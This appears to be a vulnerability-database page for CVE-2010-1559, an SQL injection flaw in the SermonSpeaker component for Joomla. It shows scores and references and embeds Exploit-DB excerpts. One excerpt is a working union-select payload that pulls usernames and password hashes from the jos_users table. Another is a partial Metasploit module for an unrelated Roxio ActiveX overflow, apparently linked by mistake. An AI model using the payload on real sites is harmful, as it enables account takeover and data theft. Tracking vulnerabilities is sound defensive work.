CVE-2010-1559
published 2010-04-27CVE-2010-1559: SQL injection vulnerability in the SermonSpeaker (com_sermonspeaker) component before 3.2.1 for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.95%
56.8th percentile
SQL injection vulnerability in the SermonSpeaker (com_sermonspeaker) component before 3.2.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a speakerpopup action to index.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| martin_hess | com_sermonspeaker | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-1559 Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)
Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: roxio_cineplayer.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Roxio CinePlayer ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX
control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.
By setting an overly long value to 'DiskType', an attacker can overrun
a buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author'
Exploit-DB
Joomla! Component SermonSpeaker - SQL Injection
exploitdb·2010-04-12
CVE-2010-1559 Joomla! Component SermonSpeaker - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection
---
# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability
# Author: SadHaCkEr
# Data : 2010-04-12
[~]######################################### InformatioN #############################################[~]
#AUTHOR: SadHaCkEr
#Email: n5s@hotmail.[choose ANY ONE] IF U lucky U will Find Me
#Website: http://www.sadx.297m.com/
#Forum : http://v4-team.net/cc
[~]######################################### ExploiT #############################################[~]
[~] Vulnerable :
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]
[~] ExploiT :
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/
[~] Example :
http://127.0.0.1/index.php?option=com_sermonspeaker&task=la
No writeups or analysis indexed.
http://joomlacode.org/gf/project/sermon_speaker/forum/?action=ForumBrowse&forum_id=7897&_forum_action=ForumMessageBrowse&thread_id=15219http://joomlacode.org/gf/project/sermon_speaker/news/?action=NewsThreadView&id=2549http://secunia.com/advisories/39385http://joomlacode.org/gf/project/sermon_speaker/forum/?action=ForumBrowse&forum_id=7897&_forum_action=ForumMessageBrowse&thread_id=15219http://joomlacode.org/gf/project/sermon_speaker/news/?action=NewsThreadView&id=2549http://secunia.com/advisories/39385
2010-04-27
Published